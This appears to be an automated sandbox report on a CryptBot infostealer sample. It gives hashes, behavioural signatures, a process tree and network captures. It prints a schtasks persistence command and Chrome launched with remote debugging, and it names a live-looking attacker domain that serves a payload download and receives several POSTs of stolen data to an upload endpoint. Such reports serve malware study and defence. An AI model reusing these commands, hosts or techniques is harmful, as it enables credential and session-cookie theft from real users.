Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
21/11/2024, 08:56 UTC
General
-
Target
f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe
-
Size
4.2MB
-
MD5
389910a7e7b0be062240be06d7ce5d31
-
SHA1
6c7f61dd43e11c3b5ee5bd21914ae5a9875adc7f
-
SHA256
f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1
-
SHA512
231c854c70859b52f000f0a374d63077dfb00ee3af1ceabc76e53ffb289008d4a94df7dd0c6ab7482ca350ee6ee8f9ca79b20881534295a6ab7a0bfe545d66a0
-
SSDEEP
98304:Va6kKK3wPgdgFfIlJgQGhx2jNyvJE0OzSDyQFRLnuYvb6HTjUwKnISeC:06kfwPytGhAjNsEpoyQFduYvbOX9KnID
Score
10/10
Malware Config
Signatures
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 2 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 4 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 34 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe"C:\Users\Admin\AppData\Local\Temp\f9fe7307aac94b1dcd354cb199243dad83dcb5c3cdf4b599e643e8321b916ef1.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6719758,0x7fef6719768,0x7fef67197783⤵
-
-
C:\Windows\system32\ctfmon.exectfmon.exe3⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2220 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2228 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2900 --field-trial-handle=1364,i,18392256791749391027,6838208789944728667,131072 /prefetch:13⤵
- Uses browser remote debugging
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 9602⤵
- Program crash
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {FB511ADD-ACC5-45A6-8642-056FCE0E9033} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
Network
-
DNShome.fvtekk5pn.topRemote address:8.8.8.8:53Requesthome.fvtekk5pn.topIN AResponsehome.fvtekk5pn.topIN A34.116.198.130 -
DNShome.fvtekk5pn.topRemote address:8.8.8.8:53Requesthome.fvtekk5pn.topIN AAAAResponse
-
GEThttp://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347Remote address:34.116.198.130:80RequestGET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
Host: home.fvtekk5pn.top
Accept: */*
ResponseHTTP/1.1 200 OK
server: nginx/1.22.1
date: Thu, 21 Nov 2024 08:56:21 GMT
content-type: application/octet-stream
content-length: 10815536
content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
last-modified: Tue, 19 Nov 2024 12:29:07 GMT
cache-control: no-cache
etag: "1732019347.4431374-10815536-3919321515"
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AResponsefvtekk5pn.topIN A34.116.198.130
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AAAAResponse
-
POSThttp://fvtekk5pn.top/v1/upload.phpRemote address:34.116.198.130:80RequestPOST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 462
Content-Type: multipart/form-data; boundary=------------------------niJA6oqvRota9edjjrcs0p
ResponseHTTP/1.1 200 OK
server: nginx/1.24.0 (Ubuntu)
date: Thu, 21 Nov 2024 08:57:09 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AResponse
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AAAAResponsefvtekk5pn.topIN A34.116.198.130
-
POSThttp://fvtekk5pn.top/v1/upload.phpRemote address:34.116.198.130:80RequestPOST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 69508
Content-Type: multipart/form-data; boundary=------------------------7nA8sk7IXLNz3KSd2nWvef
ResponseHTTP/1.1 200 OK
server: nginx/1.24.0 (Ubuntu)
date: Thu, 21 Nov 2024 08:57:11 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSwww.google.comRemote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.16.228
-
GEThttps://www.google.com/async/ddljson?async=ntp:2Remote address:172.217.16.228:443RequestGET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0Remote address:172.217.16.228:443RequestGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CKbpygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://www.google.com/async/newtab_promosRemote address:172.217.16.228:443RequestGET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMRemote address:172.217.16.228:443RequestGET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AResponse
-
DNSfvtekk5pn.topRemote address:8.8.8.8:53Requestfvtekk5pn.topIN AAAAResponsefvtekk5pn.topIN A34.116.198.130
-
POSThttp://fvtekk5pn.top/v1/upload.phpRemote address:34.116.198.130:80RequestPOST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 26906
Content-Type: multipart/form-data; boundary=------------------------axRGjYWV86FSWJWogzI98X
ResponseHTTP/1.1 200 OK
server: nginx/1.24.0 (Ubuntu)
date: Thu, 21 Nov 2024 08:57:17 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
34.116.198.130:80http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347http
HTTP Request
GET http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347HTTP Response
200 -
34.116.198.130:80http://fvtekk5pn.top/v1/upload.phphttp
HTTP Request
POST http://fvtekk5pn.top/v1/upload.phpHTTP Response
200 -
34.116.198.130:80http://fvtekk5pn.top/v1/upload.phphttp
HTTP Request
POST http://fvtekk5pn.top/v1/upload.phpHTTP Response
200 -
172.217.16.228:443https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMtls, http2
HTTP Request
GET https://www.google.com/async/ddljson?async=ntp:2HTTP Request
GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0HTTP Request
GET https://www.google.com/async/newtab_promosHTTP Request
GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGOrr-7kGIjDDfl2MlMxfzJintPwjNsN2h9PWojY6pnKeA8mkOyMV0bWfMABw4Isbpmc6GMAXSUYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM -
34.116.198.130:80http://fvtekk5pn.top/v1/upload.phphttp
HTTP Request
POST http://fvtekk5pn.top/v1/upload.phpHTTP Response
200 -
127.0.0.1:9222 -
127.0.0.1:9222
-
8.8.8.8:53home.fvtekk5pn.topdns
DNS Request
home.fvtekk5pn.top
DNS Request
home.fvtekk5pn.top
DNS Response
34.116.198.130
-
8.8.8.8:53fvtekk5pn.topdns
DNS Request
fvtekk5pn.top
DNS Request
fvtekk5pn.top
DNS Response
34.116.198.130
-
8.8.8.8:53fvtekk5pn.topdns
DNS Request
fvtekk5pn.top
DNS Request
fvtekk5pn.top
DNS Response
34.116.198.130
-
8.8.8.8:53www.google.comdns
DNS Request
www.google.com
DNS Response
172.217.16.228
-
172.217.16.228:443www.google.comhttps
-
8.8.8.8:53fvtekk5pn.topdns
DNS Request
fvtekk5pn.top
DNS Request
fvtekk5pn.top
DNS Response
34.116.198.130
-
127.0.0.1:50235
MITRE ATT&CK Enterprise v15
Persistence
Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
72KB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
10.4MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
2.5MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
8KB
-
Filesize
1.2MB
-
Filesize
72KB